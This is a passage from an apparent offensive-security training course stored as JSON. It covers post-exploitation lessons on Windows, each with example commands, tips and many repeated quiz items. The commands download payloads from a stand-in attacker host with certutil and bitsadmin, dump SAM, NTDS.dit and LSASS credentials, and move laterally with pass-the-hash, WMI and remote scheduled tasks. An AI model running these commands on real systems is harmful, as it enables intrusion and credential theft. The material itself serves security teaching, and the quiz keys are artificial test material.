-urlcache -split -f http://attacker/payload.exe C:UsersPublicpayload.exe\ncertutil -urlcache -split -f http://attacker/nc.exe C:\\temp\\nc.exe"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"certutil is a LOLBin because it...","opts":["Is malware","Is a legitimate system binary that can download files","Requires admin","Is third-party software"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"px-bitsadmin-dl","cat":"Post-Exploitation","title":"BITS Transfer for Stealth","diff":2,"xp":150,"intro":"Use Background Intelligent Transfer Service for stealthy downloads.","sections":[{"type":"text","content":"BITS is Windows' background download service (used by Windows Update). Using it for downloads blends with normal system behavior."},{"type":"code","lang":"powershell","content":"bitsadmin /transfer job /download /priority normal http://attacker/payload.exe C:UsersPublicpayload.exe\n# Or PowerShell\nStart-BitsTransfer -Source http://attacker/payload.exe -Destination C:payload.exe"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"BITS downloads are stealthy because...","opts":["They're encrypted","BITS is used by Windows Update \u2014 downloads blend with normal traffic","They're faster","They bypass antivirus"],"ans":1},{"type":"quiz","q":"NTDS.dit contains...","opts":["Web pages","All domain user password hashes","Network configs","Log files"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1}]},{"id":"px-wmi-exec","cat":"Post-Exploitation","title":"WMI Remote Execution","diff":2,"xp":150,"intro":"Execute commands on remote machines via WMI.","sections":[{"type":"text","content":"Windows Management Instrumentation allows remote process creation, query, and management. No additional tools needed \u2014 WMI is built into Windows."},{"type":"code","lang":"bash","content":"# From Linux\nimpacket-wmiexec admin@target -hashes :HASH\n# From Windows\nwmic /node:target process call create 'cmd.exe /c whoami > C:output.txt'\n# PowerShell\nInvoke-WmiMethod -ComputerName target -Class Win32_Process -Name Create -ArgumentList 'cmd /c whoami'"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"WMI remote execution uses which port?","opts":["SMB (445)","DCOM/WMI (135 + dynamic)","SSH (22)","RDP (3389)"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"px-winrm-exec","cat":"Post-Exploitation","title":"WinRM Remote Execution","diff":2,"xp":150,"intro":"Execute commands via Windows Remote Management.","sections":[{"type":"text","content":"WinRM (port 5985/5986) provides remote PowerShell sessions. evil-winrm is the go-to tool from Linux."},{"type":"code","lang":"bash","content":"# From Linux\nevil-winrm -i target -u admin -p password\nevil-winrm -i target -u admin -H NTLM_HASH\n# From Windows\nEnter-PSSession -ComputerName target -Credential admin\nInvoke-Command -ComputerName target -ScriptBlock {whoami}"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"WinRM uses which ports?","opts":["22, 23","5985 (HTTP), 5986 (HTTPS)","445, 139","3389"],"ans":1},{"type":"quiz","q":"NTDS.dit contains...","opts":["Web pages","All domain user password hashes","Network configs","Log files"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1}]},{"id":"px-scheduled-task-exec","cat":"Post-Exploitation","title":"Remote Scheduled Task Execution","diff":2,"xp":150,"intro":"Create tasks on remote machines for code execution.","sections":[{"type":"text","content":"schtasks with /S creates tasks on remote machines. Combined with UNC paths or pre-uploaded payloads, it provides reliable lateral movement."},{"type":"code","lang":"bash","content":"schtasks /create /S target /U admin /P password /TN 'Update' /TR 'C:payload.exe' /SC once /ST 00:00\nschtasks /run /S target /U admin /P password /TN 'Update'\nschtasks /delete /S target /U admin /P password /TN 'Update' /F"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Remote scheduled tasks are useful for...","opts":["File transfer","Lateral movement \u2014 executing code on remote machines","Log analysis","Network scanning"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"px-sam-ntds","cat":"Post-Exploitation","title":"SAM vs NTDS.dit: Local vs Domain Hashes","diff":1,"xp":75,"intro":"SAM stores local hashes, NTDS.dit stores all domain hashes.","sections":[{"type":"text","content":"SAM is on every Windows machine (local accounts). NTDS.dit is only on Domain Controllers (every domain account). Different targets, different value."},{"type":"code","lang":"bash","content":"# SAM (local accounts)\nreg save HKLMSAM SAM && reg save HKLMSYSTEM SYSTEM\nimpacket-secretsdump -sam SAM -system SYSTEM LOCAL\n# NTDS.dit (domain accounts)\nimpacket-secretsdump domain/admin:pass@DC -just-dc"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"NTDS.dit is only found on...","opts":["Every Windows machine","Domain Controllers only","File servers","Workstations"],"ans":1},{"type":"quiz","q":"NTDS.dit contains...","opts":["Web pages","All domain user password hashes","Network configs","Log files"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1}]},{"id":"px-token-priv","cat":"Post-Exploitation","title":"Token Privilege Enumeration","diff":1,"xp":75,"intro":"Check your Windows token for exploitable privileges.","sections":[{"type":"text","content":"whoami /priv shows your token privileges. Key ones: SeImpersonate (Potato attacks), SeDebug (process injection), SeBackup (read anything), SeRestore (write anything)."},{"type":"code","lang":"bash","content":"whoami /priv\n# Key privileges to look for:\n# SeImpersonatePrivilege -> Potato attacks (SYSTEM)\n# SeDebugPrivilege -> inject into SYSTEM process\n# SeBackupPrivilege -> read SAM/SYSTEM hives\n# SeRestorePrivilege -> write to any file\n# SeLoadDriverPrivilege -> load kernel driver"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Which privilege enables Potato attacks?","opts":["SeDebugPrivilege","SeImpersonatePrivilege","SeBackupPrivilege","SeLoadDriverPrivilege"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"px-lsass-dump-methods","cat":"Post-Exploitation","title":"LSASS Dump Methods","diff":3,"xp":200,"intro":"Multiple ways to dump LSASS without touching mimikatz.","sections":[{"type":"text","content":"Mimikatz is heavily signatured. Alternatives: comsvcs.dll MiniDump, ProcDump (Sysinternals), Task Manager, nanodump, and direct syscall dumpers."},{"type":"code","lang":"bash","content":"# comsvcs.dll (built-in Windows DLL)\nrundll32 C:windowsSystem32comsvcs.dll MiniDump <lsass_pid> C:\\templsass.dmp full\n# ProcDump (Sysinternals - signed by Microsoft)\nprocdump -ma lsass.exe lsass.dmp\n# Then extract offline with mimikatz\nmimikatz# sekurlsa::minidump lsass.dmp\nmimikatz# sekurlsa::logonpasswords"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"comsvcs.dll LSASS dump avoids detection because...","opts":["It's encrypted","It's a legitimate Windows DLL (not flagged like mimikatz)","It's faster","It doesn't require admin"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist 